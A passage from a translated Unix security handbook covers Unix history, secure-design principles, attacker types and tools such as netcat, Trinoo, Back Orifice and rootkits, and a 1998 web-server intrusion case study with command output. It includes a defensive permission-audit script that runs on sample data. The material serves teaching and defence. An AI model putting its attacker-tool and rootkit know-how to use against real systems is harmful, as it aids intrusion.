‫ﺍﺳﺖ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﻔﺎﻫﻴﻢ ﺑﻪ ﻭﺿﻮﺡ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻣﺜﺎﻟﻬﺎﺋﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ‬
‫ﺍﻓﺮﺍﺩﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﻛﺎﺭ ﺑﺎ ﺳﻴﺴﺘﻢ ﻭ ﺭﺍﻫﺒﺮﻱ ﺁﻥ ﺩﺍﺭﻧﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑـﺴﻴﺎﺭ ﻋﻼﻗـﻪﻣﻨـﺪ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻨﺪ(‪ .‬ﺑـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ‬
‫ﻋﻼﻗﻪﻣﻨﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﻛﻪ ﺑﻪ ﻣﺂﺧﺬ ﺍﺭﺯﺷﻤﻨﺪ ﻓﺮﺍﻭﺍﻧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻧﻈﺮ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺑﻪ ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍﻳﺎﻧﻪ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺨﺶ ‪ ۵‬ﺷﺎﻣﻞ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻋﻤﺪﻩ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﮔﺮﭼﻪ ﻗﺴﻤﺖ ﻋﻤﺪﺓ ﺑﺨﺶ ‪ ۵‬ﺗﺎ‬
‫ﺟﺎﻳﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻏﻴﺮ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﺭﺟﺎﻉﻫﺎﻳﻲ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪،Unix ،Microsoft Windows‬‬
‫‪ ،Mac OS X ،Linux‬ﻭ ﺳﺎﻳﺮ ﮔﻮﻧﻪﻫﺎﻱ ‪ Unix‬ﺭﻭﻣﻴﺰﻱ‪ ٣‬ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﺗﻮﺻﻴﻪﻫـﺎﻱ ﺭﻭﺷـﻨﻲ ﺩﺭﺑـﺎﺭﻩ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ‬
‫ﻣﻲﺗﻮﺍﻥ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﻪﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻥ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫‪Unix‬‬
There are many different Unix and Unix-like operating systems (some of them quite different from one another), distributed by different vendors. Understanding why this is so, and what its effects are, requires a brief historical review.
The roots of Unix go back to the Multics project of the mid-1960s. This project, funded by the US Department of Defense Advanced Research Projects Agency (DARPA or ARPA), was designed to be an integrated system made up of banks of high-speed processors, memory, and communications equipment. Under this design, part of the computer could be shut down for repair without affecting other parts or users. Although this capability is readily available today, it did not exist when Multics began. Multics was designed both to resist external attacks and to protect the system's internal users from one another. Multics was designed to support the concept of multilevel security. Multics eventually provided a level of security and service that many computer systems have still not reached.
While Multics tried to do many things, Unix tried to do one thing well: run programs. "Strong security" was not part of that goal. The system was built from compact programs called tools, each of which performed a single function. During the 1970s American Telephone & Telegraph (AT&T) added tools and features to it. In 1973 Thompson rewrote most of the Unix programs in the C programming language, which Ritchie had recently invented. C was designed to be a simple and portable programming language. Programs written in C could easily be moved from one type of computer to another, as was possible with high-level programming languages such as Fortran. Yet these programs ran at nearly the speed of programs coded directly in the machine's native language. By 1977 more than 500 sites were using the operating system; 125 of them were universities in the United States and in more than 10 other countries.
Development continued in several places, including the University of California at Berkeley, which released the Berkeley Software Distribution (BSD), a collection of programs and modifications to the Unix system. Over the next six years, in an effort funded by ARPA, what had by then come to be called BSD Unix grew into an operating system in its own right and brought significant improvements to the AT&T operating system. Perhaps the most important of the Berkeley improvements were in networking, which made it easy to connect Unix computers to local area networks (LANs). For all these reasons, the Berkeley version of Unix became very popular in the research and academic communities.
In the late 1980s, as Unix moved from technical uses into commercial markets, incompatibilities between versions of AT&T Unix and operating systems based on BSD Unix began to cause problems for all vendors. Commercial customers wanted a standard version of Unix, hoping to reduce training costs and guarantee software portability between computers made by different vendors. The emerging market for Unix application software also called for a standard, because vendors believed it would make it easier for them to support multiple platforms and would also let them compete with the growing market based on personal computers.
In May 1988, seven leading companies in the Unix industry (Apollo Computer, Digital Equipment Corporation, Hewlett Packard (HP), IBM, and three major European computer manufacturers) announced the formation of the Open Software Foundation (OSF). The goal of OSF was to take Unix out of AT&T's control and place it in the hands of a non-profit industry coalition that would guide the future development of Unix and make it available to everyone under a single license. OSF decided to base its Unix on IBM's implementation, then moved to the Mach Unix kernel from Carnegie Mellon University, which was a mixture of libraries and utilities from HP, IBM and Digital Equipment Corporation. Although the result of these efforts was not widely adopted, OSF continued with further development work.
GNU
Richard Stallman, a programmer on the LISP project at the university's artificial intelligence laboratory, was deeply upset when he saw that the companies founded to put that research to use adopted rules that prevented the free sharing of software. Stallman realized that if he wanted to share his software with a large group of people, he could not base his work on specialized hardware that was built by only a few manufacturers and ran only LISP. Instead he decided to found a new software community based on Unix, a powerful operating system that resembled the earlier system and also had a future. He called his project GNU, a recursive acronym for "GNU's Not Unix"! For Stallman, "free" was not only a measure of cost but also a measure of freedom. Being free meant that he was at liberty to inspect the program's source code and make changes to it, and also free to share copies of the program with his friends. He wanted software to be free in the sense of free speech, not in the sense of free alcoholic drinks. By 1985 the first major GNU product, the Emacs text editor, had matured to the point where it could readily be used by people other than Stallman. Stallman then began work on a free C compiler, GNU C. Both programs were distributed under Stallman's GNU General Public License (GPL). This license gave developers the right to distribute the source code and to make their own changes, provided that all future changes to the program were released under the restrictions of the same license. That same year Stallman founded the Free Software Foundation, a non-profit foundation that collected public donations and used them to hire programmers who wrote freely redistributable software.
Unix and Minix
At about the same time that Stallman started the GNU project, Professor Andrew S. Tanenbaum decided to create his own implementation of the Unix operating system for use in teaching and research. Because all of the code was written from scratch, he could freely publish the source code in his textbook and distribute a working operating system without paying royalties to AT&T. This system, Minix, ran on IBM PC AT-compatible personal computers equipped with Intel-based processors. The project produced a stable, well-documented software platform and an excellent operating systems textbook. However, "efficiency" was not a primary criterion in the design of Minix, and this, together with copyright issues relating to the textbook, meant that Minix did not turn out to be a good choice for widespread everyday use.
In 1991 a Finnish computer science student named Linus Torvalds decided to create a free version of the Unix operating system that would be better suited to everyday use. Starting from the Minix code, Torvalds reimplemented the kernel and file system step by step until he had a new system that contained none of Tanenbaum's original code. Torvalds named the resulting system "Linux" and decided to distribute it under Stallman's GPL. By combining his system with other freely available tools, notably the Free Software Foundation's GNU C compiler and text editor and the X Consortium's window server, Torvalds was able to create a complete, working operating system. Work on Linux continues to this day, carried on by hundreds of contributors.
NetBSD, FreeBSD, OpenBSD
In 1988 the Berkeley Computer Systems Research Group (CSRG) started a project to remove all AT&T code from its operating system. "Networking Release 1", first made available in June 1989, included Berkeley's implementation of TCP/IP and related utilities. It was distributed on tape for 1000 dollars, and anyone who bought it was allowed to make any changes they wished to the code, provided the original copyright restrictions were preserved. Several large sites made the code available by anonymous FTP, and the Berkeley code quickly became the basis of many TCP/IP implementations throughout the industry. An interim release called 4.3BSD Reno appeared in early 1990, and a second interim release, "Networking Release 2", in June 1991. This release was a complete operating system except for 6 remaining files in the kernel that contained AT&T code and had therefore been left out of the operating system. In the autumn of 1991 Bill Jolitz wrote these files for the Intel processor and produced a working operating system called 386/BSD.
Within a few months a group of volunteers formed to maintain and develop the system, and their effort was named NetBSD. The NetBSD project quickly split. Some members believed that the project's primary goal should be extended so that it supported as many different platforms as possible and continued to pursue operating system research, while another group of developers believed they should devote their resources, as far as possible, to making programs run better on the Intel/386 platform and making the system easier to use. The second group broke away from the first and started the FreeBSD project. A few years later, another splinter group left the NetBSD project. This group believed that security and reliability had not received the attention they needed. Its emphasis was on careful review of the source code to identify potential problems. It restricted the adoption of new code and drivers until they had been thoroughly reviewed for quality. This third group took the name OpenBSD.
Businesses Adopt Unix
Because of Microsoft's monopolistic pricing and the security and elegance of Unix operating systems, many businesses became interested in using commercial products based on Linux. A number of network appliance vendors found the stability and security of the OpenBSD platform attractive and used it in their products. The stability and support offered by BSDI appealed to other commercial users, especially some of the major early web hosting companies; that product was called BSD/OS. Various universities also chose BSD/OS for its favourable licensing terms and for its support for students and faculty.
Meanwhile, Linux became very common among people looking for an alternative operating system for their personal computers. Although OpenBSD was a somewhat more secure and more stable operating system, Linux supported a much wider variety of hardware, and installing and working with it was also somewhat easier.
All of this interest, combined with the growing problems of Microsoft's monopoly in the operating system market, drew the attention of IBM and Dell, both of which had announced commercial support for Linux. Around the same time two companies devoted solely to the Linux operating system, Red Hat and VA Linux, achieved two of the most successful initial public offerings in the history of the US stock market. Shortly afterwards HP announced that it would support a version of Linux on its systems.
Another key influence came in the second half of the 1990s, when researchers at various national laboratories, at universities, and at NASA began working with clustered computers. In a cluster, hundreds of personal computers are acquired, mounted in racks, and connected by high-speed networks. On such systems, instead of being run very fast on a single computer, large problems are divided into manageable pieces and analysed in parallel on the neighbouring computers. Although this approach was not applicable to every problem, it often worked better than using a single supercomputer and cost far less. One of the first working systems of this kind, named Beowulf, was based on Linux. Because this code was shared and extensively developed by the supercomputing community, Linux quickly spread among other groups around the world who wanted to do similar work.
Today many businesses and research laboratories work with Linux. They use Linux to run web servers and e-mail servers and, to a lesser extent, as a general-purpose desktop platform. Instead of buying supercomputers, businesses build large Linux clusters, which can solve large computing problems through parallel execution. FreeBSD, NetBSD, and OpenBSD are likewise well suited to these applications and are widely used. Nevertheless, anecdotal evidence suggests that Linux has seen greater growth in users than any other system. Given the commercial support that has been announced, including ventures announced by Sun Microsystems, Linux appears to have the stronger growth momentum in the market. Even so, at least because of security and performance considerations, we do not expect the other BSD variants to fade away; although the BSD groups continue their separate existence, they do not appear likely to take any of Linux's market share.
There are numerous versions of the Linux and BSD operating systems that boot the system from a single floppy disk. These versions, which include Trinux, picoBSD and closedBSD, are designed for applications where a high level of security is required, including forensic use, recovery, and network appliances.
Security and Unix
Like systems based on Microsoft Windows NT, Unix is a multi-user, multitasking operating system. Multi-user means that the operating system allows different people to use the computer at the same time. Multitasking means that each user can run several programs simultaneously. One natural function of such an operating system is to prevent the different people (or programs) that are using the same system at the same time from interfering with one another. Without such protection, a wayward program could affect other programs or users, could accidentally delete files, or could disrupt the operation of the entire computer system. To prevent such disasters, some form of computer security has always had a place in the Unix design philosophy.
Unix security provides more than mere memory protection. Unix has a sophisticated security system that controls the ways in which users access files, modify system databases, and use system resources. Unfortunately, these mechanisms do not help much when the system is misconfigured, is used carelessly, or contains buggy software. Nearly all the security holes found in Unix over the years have stemmed from problems of this kind rather than from shortcomings in the internal design of the system. Nearly all Unix vendors therefore believe that they can provide a reasonably secure operating system. We believe that Unix systems can be much more secure than other operating systems, but there are nevertheless factors that work against greater security in this environment.
Expectations and Hopes
Many users have grown up seeing Unix configured in a particular way. Their experience of Unix in academic, hobbyist, and research settings has always been one in which they had access to every directory and most commands on the system. Users may have become accustomed to their files being world-readable by default. Users have also often become accustomed to being able to build and install whatever software they choose, something that usually requires system-level access (the highest level of access).
Unfortunately, all of these expectations run contrary to good security practice. To achieve stronger security, managers and system administrators need, from time to time, to restrict access rights to files and commands that users do not really need in order to do their jobs. On this basis, someone who needs e-mail and a word processor for their work has no need to expect to be able to run network analysers and the C compiler. Likewise, to increase security, users should not be able to install software that has not been tested and approved by a trained and authorized person.
Administrators can raise the level of security by applying some general security principles to a reasonable degree. For example, instead of removing all compilers and libraries from every machine, these tools can be protected so that only users who belong to a particular user group can access them. Users who need such access, and who can be trusted to take the necessary care, can be added to that group. Similar methods can be used for other classes of tools, such as network monitoring software or Usenet news programs. In addition, changing the traditional view of "data" on a system (from readable by default to unreadable by default) can be useful. For example, users' files and directories should, by default, be protected against read access instead of being readable by everyone. Setting file access controls correctly and using shadow password files are two examples that show how this simple change in system configuration can improve security across the whole of Unix.
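As an added illustration (not part of the handbook), the shell functions below check the three defaults this passage recommends: user trees closed to other users by default, a compiler restricted to one group, and password hashes kept out of the world-readable passwd file. The function names, the sample tree and the sample passwd lines are all constructed for the example.

```shell
#!/bin/sh
# Added example. Everything runs against a constructed tree in a temporary
# directory; no real system file is read or changed.

# Print files and directories under $1 that "others" may read.
world_readable() {
    find "$1" \( -type f -o -type d \) -perm -004 -print
}

# Number of world-readable entries under $1 (0 = closed by default).
count_world_readable() {
    world_readable "$1" | wc -l | tr -d ' '
}

# Succeeds if "others" hold any permission bit (r, w or x) on $1 itself.
others_have_access() {
    [ -n "$(find "$1" -prune \( -perm -004 -o -perm -002 -o -perm -001 \) -print)" ]
}

# Restrict a tool to one group: owner rwx, group r-x, others nothing.
# $1 = tool path, $2 = group (name or numeric GID) allowed to run it.
restrict_to_group() {
    chgrp "$2" "$1" && chmod 750 "$1"
}

# Print account names whose passwd entry still carries a hash in field 2.
# With shadow passwords in use, that field holds only "x" (or "*").
exposed_hashes() {
    awk -F: '$2 != "x" && $2 != "*" { print $1 }' "$1"
}

# Build the constructed sample under directory $1: one home tree created
# with the permissive umask 022, one with umask 077, a stand-in compiler
# and a passwd-format file (sample data, not real accounts).
build_sample() {
    ( umask 022; mkdir "$1/home_open";   : > "$1/home_open/plan.txt" )
    ( umask 077; mkdir "$1/home_closed"; : > "$1/home_closed/plan.txt" )
    : > "$1/cc"; chmod 755 "$1/cc"
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
alice:CONSTRUCTED-HASH-VALUE:1000:1000::/home/alice:/bin/sh
bob:x:1001:1001::/home/bob:/bin/sh
EOF
}

# Run with --demo to print the findings for the sample tree.
if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d) && build_sample "$d"
    echo "home_open,   umask 022: $(count_world_readable "$d/home_open") world-readable"
    echo "home_closed, umask 077: $(count_world_readable "$d/home_closed") world-readable"
    restrict_to_group "$d/cc" "$(id -g)"
    others_have_access "$d/cc" || echo "cc: no access for others"
    echo "hash still in passwd for: $(exposed_hashes "$d/passwd")"
    rm -rf "$d"
fi
```

On a live system the same functions would be pointed at the users' home directories, the real compiler path and the real passwd file.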
The most critical aspect of improving Unix security is getting users to take part in meeting these expectations. Clearly, if users have grown accustomed to the personal operating systems that preceded Microsoft Windows NT, this advice applies equally to improving the security of NT-based systems. The way to reach this goal is not by issuing directives but through education, awareness, and motivation. Technical security measures are very important, but experience has shown again and again that people problems cannot be solved by technology-based solutions. Many users began using computers in an environment that was less threatening than the one they face today. Educating users about the dangers that exist, and about how much their cooperation can help to neutralize those dangers, increases the security of the system. By properly motivating users to take part in good security practice, you make them part of the security mechanism. Better education and better motivation produce good results only when they are applied together. Education without motivation can mean that security measures are not actually applied, and motivation without education can mean that gaps are left in the work that is done.
Chapter Two
Security for Administrators
Overview
This chapter gives a working definition of security for operational managers, discusses the design of secure systems, and explains who attacks computer systems. It lists some of the attackers' common tools and describes a case study of a sample attack.
Security and Administrators
As a technical administrator, you are responsible for ensuring that the systems you manage work the way they are supposed to. Although there are many formal definitions of security, a useful working definition for administrators is: "A computer is secure if you can depend on it and its software to behave as you expect."
If the information you entered into the computer today is still there in a few weeks, and remains unread by those who should not read it, then the computer is secure. Seen this way, security is a critical task in every one of an administrator's roles. By this definition, natural disasters and buggy software are as much a threat to security as unauthorized users.
Poorly Written Software
Designing secure computer systems and software is not easy. In 1975, Jerome Saltzer and M. D. Schroeder defined seven criteria for building such a system. These criteria are:
Least privilege
Every user and process should have the least set of access rights necessary. Least privilege limits the damage that can be done by malicious attackers and, equally, by errors. Access rights should not be assigned to users by default; they should be assigned only when they are explicitly needed for the users' work.
Economy of mechanism
The design of the system should be small and simple so that it can be verified and correctly implemented.
Complete mediation
Every access should be checked for proper authorization.
Open design
Security should not depend on the attacker's ignorance. This criterion rules out back doors in the system that give access to users who know about them.
Separation of privilege
Wherever possible, access to system resources should depend on more than one condition being satisfied.
Least common mechanism
Users should be isolated from one another by the system. This limits both covert monitoring and cooperative efforts to defeat the system's security mechanisms.
Psychological acceptability
Security controls must be easy to use so that they are actually used and not set aside.
Unfortunately, designers never learn these criteria, or if they do learn them they forget them, take shortcuts, or conclude that these issues are not important enough to bother with. As a result there are many operating systems, algorithms, applications and other software that are flawed in design yet are in widespread use and claim to be part of the security foundation of a system. Poor design leads to problems and unforeseen side effects that may cause accidental damage to systems or information, or may be deliberately exploited by an attacker.
Free Software versus Proprietary Software
One of the more contentious issues in software design is whether development processes that make source code freely available for inspection, modification, and redistribution ("free software" or "open source") should, for security reasons, be preferred over proprietary ("closed source") software.
On the one hand, if source code is freely available, attackers can more easily find exploitable flaws in a program by reading its source. Because there are many common classes of programming error that lead to vulnerabilities, source code can sometimes even be handed to automated analysis programs to reveal problems. Problems in open source software have largely been found and exploited.
On the other hand, closed source software is no cure. In many cases software can be "reverse engineered", or vulnerabilities can be identified through black-box testing of the program without the source code being available. Clearly, lack of access to the source of, for example, Microsoft's Internet Information Server (IIS) has not prevented attackers from exploiting its various vulnerabilities, and this product appears to have had more reported exploits than, say, the Apache web server, whose source is publicly available.
With open source software, the program's developers and users can find problems and their fixes before attackers do, and publish them ahead of any exploit. The OpenBSD operating system, which is free software, is widely regarded as one of the most secure operating systems currently available, mainly because every line of its kernel source code has also been audited for security by its developers. The kernels of other open source operating systems, including Linux, are not reviewed this rigorously and contain code from a large number of developers. It is difficult to know the degree of security review applied to proprietary Unix operating systems such as Solaris.
Knowing the Attacker
Who breaks into the computers on a network using the most sophisticated kinds of attack? It almost does not matter; that is, what is important is not who the attackers may be, but that the system must be protected against all of them.
Script Kiddies
As the name suggests, in many cases the attackers are children and teenagers: people who, unfortunately, have not yet developed the sense of responsibility and judgement needed to keep their technical skills in check.
Young people who use sophisticated attack tools are called script kiddies. The term is derisive. The word "script" refers to the fact that these attackers, instead of creating their own attacks, use ready-made attack scripts that can be downloaded from the Internet. They are called "kiddies" because many of them have been under the legal age when arrested.
Script kiddies should be treated as a serious threat and danger, for the same reason that a teenager with a gun should be feared. In many cases teenagers carrying handguns should be feared even more than adults, because a teenager about to pull the trigger is less likely to understand the consequences of the act and is therefore more likely to pull it.
The same holds for script kiddies. For example, in 2001 the web site of Gibson Research Corporation was the target of a distributed denial of service (DDoS) attack that put it out of action for more than 17 hours. The attack was carried out through more than 400 Windows-based computers on the Internet that had been compromised in order to conduct an automated attack. When the matter came to light, Steve Gibson managed to obtain a copy of the attack program and then to reverse-engineer and trace it. It finally emerged that the person who had attacked his web site was a 13-year-old girl.
Script kiddies may lack the technical skill needed to write their own scripts and Trojan horses, but this causes them little difficulty. They have tools at their disposal and are inclined to use them; either they do not understand the damage they cause or they do not care.
In another similar case, when Canadian authorities on 19 April 2000 arrested "Mafiaboy" for his February 2000 attacks on Yahoo, E*TRADE, CNN, and many other high-profile sites, attacks that had caused 1.7 billion dollars in damage, they could not release the suspect's name to the public, because the 16-year-old boy was protected by Canada's law on the privacy of minors.
What will a script kiddie become when he grows up? Nobody is sure yet; there are no reliable studies. Anecdotal reports say that many script kiddies go straight. Some lose interest in computers, some become system operators or network administrators, and some even return to the field of computer security (hiring such individuals to monitor networks is still a controversial subject in computer security circles), but it goes without saying that some of them continue their life of crime.
Industrial Spies
There appears to be a growing black market for information stolen from computer systems. Some individuals have tried to blackmail and extort money from the legitimate owners of the information, for instance by offering to fix a company's vulnerabilities in exchange for large sums. There have been several documented cases (and probably many unreported ones) in which criminals stole customers' credit card numbers from a company's server and threatened to publish the information unless the company paid them. There are also reports of attackers trying to sell the trade secrets of the companies they have penetrated to those companies' competitors. Such transactions have been declared illegal in the United States and in many other countries, though not in all.
Ideologues and Government Agents
In every society there is always a population of "dissident thinkers" who break into sites for ideological or political reasons. Usually the intent of these people in defacing web pages is to publish some kind of statement. Sometimes the dissidents publish a political statement, sometimes they may express an ideological point, or they may simply be anarchists making noise against industry or the market.
These incidents may sometimes be carried out against national interests. For example, a guerrilla movement may deface sites belonging to a group of its government opponents. In other cases, individuals are seen trying to advance a goal in one jurisdiction by attacking sites in another, as in the Israeli-Palestinian conflict, the dispute between India and Pakistan, and the aftermath of the bombing of the Chinese embassy by US forces. Many of these attacks may be spontaneous, but some may be planned and funded by governments themselves.
These incidents can also affect third parties. For example, during one incident in China, many ISPs around the world that hosted web pages of Falun Gong supporters found that their servers were under attack from sites inside China. Because of the coordination and number of the attacks, authorities believe that they were state-sponsored.
Organized crime
Every day enormous amounts of valuable information and financial data are exchanged over the Internet. It is naive to imagine that criminal elements are unaware of this, or are not interested in extending their activities to the networked world. Attacks such as fraud, information theft, and money laundering conducted online have occurred, and authorities believe that they all fall under organized crime. Network communications have been used to expand and coordinate prostitution, gambling, trade in illegal substances, armed assault, and other activities that usually fall under organized crime. In addition, law enforcement agencies may be targeted by criminals who want to discover what the government knows about them, or to discover the identities of informants and witnesses.
With the globalization of the network, threats have become more widespread. Today Russian gangs of thieves, Sicilian Mafiosi, the Japanese Yakuza, South American drug traffickers, and Los Angeles street gangs are all only a few mouse clicks away from us on the global network. Many law enforcement officials worry that the Internet will be a growth area for crime in the coming decade.
Rogue employees
Finally, there are many skilled employees who have acted against their employers out of revenge, malice, or a wish to harass. In some cases, fired employees have planted Trojan horses in their employer's computers.
What attackers want
Merely gaining control of a computer system is usually not the end of an intruder's work; attackers often use the systems they have taken over as a first step toward further attacks and sabotage. Once an attacker has taken over a system, it can be used for a variety of malicious purposes, including:
• launching probes or exploits against other systems;
• enlisting the system in distributed denial-of-service attacks;
• running covert servers (for example, the attacker might set up an Internet Relay Chat server that acts as a rendezvous point for Trojan horses and viruses that send back stolen data);
• covertly monitoring the network of the organization that owns the compromised systems, with the aim of compromising more systems; and
• turning it into a repository of attack tools, stolen software, pornography, or other kinds of contraband information.
There are many reasons why compromised systems make excellent platforms for these kinds of illegal activities. If a compromised system has a high-speed connection to the Internet, it may be able to cause more damage and disruption than other systems under the attacker's control. Compromised systems can also be used to make it harder for authorities to trace the attacker's actions back to the real attacker. If an attacker hops through many computers in different jurisdictions (for example, from a Unix account in France to a Windows-based proxy server in South Korea, and from a university computer center in Mexico to a backbone router in New York), it may truly become impossible to trace the attacker back to the source.
Tools of the attacker's trade
Some of the tools commonly used by attackers are:
nc (a.k.a. netcat)
netcat, originally written by Hobbit, is the Swiss Army knife of IP-based networks. As such, netcat is a valuable administrative tool and is also useful to attackers. You can use netcat to send arbitrary data to arbitrary TCP/IP ports on remote computers, to set up local TCP/IP servers, and to run basic port scans.
Trinoo (a.k.a. Trinoo)
Trinoo is an attack server. The program waits for a message from a remote system and, on receiving it, launches a denial-of-service attack against a third party. Versions of Trinoo exist for most Unix operating systems, including Solaris and Red Hat Linux. The presence of Trinoo is usually hidden. A detailed analysis of Trinoo is available at the following address:
http://staff.washington.edu/dittrich/misc/trinoo.analysis
Back Orifice and Netbus
These Windows-based programs are Trojan horses that enable attackers to monitor keystrokes, access files, upload and download programs, and run software on the systems under their control.
Bots
Bots (short for robots) are small programs that are usually planted by an attacker on a number of computers scattered across the Internet. Bots are one of the primary tools for controlling and conducting distributed denial-of-service attacks over Internet Relay Chat channels. Bots may be distributed by viruses or Trojan horses. These programs may remain dormant for days, weeks, or months and then become active. Bots can also be used for automated tasks.
Rootkits
A rootkit is a program or set of programs that simultaneously gives the attacker superuser access on a computer, plants back doors in the computer, and erases every trace of the attacker's presence. Rootkits were originally designed for Unix systems (hence the name, after the root user account), but they have also been produced for Windows systems. A typical rootkit may make many attempts to obtain superuser access. Once superuser access has been obtained, the rootkit can modify the login program so that a back door is added to it. It then modifies the kernel so that any attempt to read the login program returns an altered result instead of the actual program; commands may be modified so that network connections from the attacker's computer are not displayed; and finally the rootkit may delete the last five minutes of the computer's log files.
Worms
Worms, which exploit vulnerabilities in network servers or in the networking components of operating systems, have become a common way to compromise large numbers of computers at once.
Case study: Faxsurvey
On October 7, 1998, an employee at Vineyard.NET noticed that the user http was logged in to the company's main web server:
Script started on Wed Oct 7 20:54:21 1998
bash-2.02# w
8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35
USER     TTY  FROM              LOGIN@   IDLE   WHAT
http     p0   KRLDB110-06.spli  Tue02AM  1days  /bin/sh
simsong  p1   asy12.vineyard.n  8:42PM   15     -tcsh (tcsh)
ericx    p2   mac-ewb.vineyard  8:46PM   0      script
ericx    p3   mac-ewb.vineyard  8:46PM   11     top
ericx    p4   mac-ewb.vineyard  8:53PM   1      sleep 5
bash-2.02#
The computer was running BSDI version 3.1 with all the patches and fixes provided by the vendor. The web server was a version of the Apache server known as "Stronghold". The computer was used to initiate automated electronic funds transfers on customer accounts. To assist with these transfers, the computer stored bank account and credit card information. (Fortunately, this information was stored on the computer in encrypted form.)
In any such case, a user logged in as http can be the result of one of two things. First, it may be a member of the ISP's staff who was using the http account for debugging; otherwise, it may be an attacker who has found a way to break into the http account but has not managed to gain further access. Because the http user had logged in from a computer whose name began with KRLDB110-06.spli, the staff member realized that this was unauthorized access.
When the intrusion was discovered, one of the staff immediately ran the Unix script program to record the intruder's actions. The intruder appeared not to have been active on the network for more than a day after that. The initial intrusion had occurred on Tuesday at 2 a.m. The next step was to list all the processes running on the computer at that time. Two processes were unusual: two copies of the /bin/sh shell that had been run by http. Both of these shells had been started the previous day, one at 2 a.m. and the other at 4 a.m.:
bash-2.02# ps auxww
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 11766 3.0 0.0 0 0 ?? Z 23Sep98 0:00.00 (admin-server)
root 3763 1.0 0.0 0 0 ?? Z 2:03PM 0:00.00 (junkbuster)
mail 18120 1.3 0.3 816 724 ?? S 8:56PM 0:00.46 smap
root 17573 1.0 0.0 0 0 ?? Z 11:03AM 0:00.00 (admin-server)
root 16 0.0 0.0 68 64 ?? Is 10Sep98 0:00.00 asyncd 2
root 18 0.0 0.0 68 64 ?? Is 10Sep98 0:00.02 asyncd 2
root 28 0.0 8.0 748 20680 ?? Ss 10Sep98 0:16.32 mfs -o rw -s 40960 /dev/sdob/tmp (mount_mfs)
root 53 0.0 0.1 268 296 ?? Ss 10Sep98 0:38.23 gettyd -s
root 18670 0.0 0.5 560 1276 ?? S Tue02AM 0:04.77 (xterm)
http 18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh
http 26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.7 /bin/sh
…
It appeared that the intruder had succeeded in breaking in and then, for some reason, had abandoned the effort. To deal with this threat, the ISP laid down the following rules:
1. Do not tip off the intruder to what is happening.
2. Find the intruder's source IP address.
3. Use the Unix kill command to stop the intruder's processes. This command prevents them from running while leaving a copy of the processes in memory.
4. Use the Unix gcore command to make a copy of the intruder's processes.
5. Define a rule on the ISP's router to block packets sent from the intruder's ISP.
6. Terminate the intruder's processes completely with the kill -9 command.
7. Determine how the intruder got into the system and fix the hole that was exploited.
8. Notify law enforcement.
To trace the intruder, the ISP tried using the netstat command. Doing so yielded new information. The intruder had not logged in with telnet or SSH; instead, there was an X11 connection from the web server (Apache.Vineyard.NET) to an X server running on the attacker's computer.
bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1137 SYN_RCVD
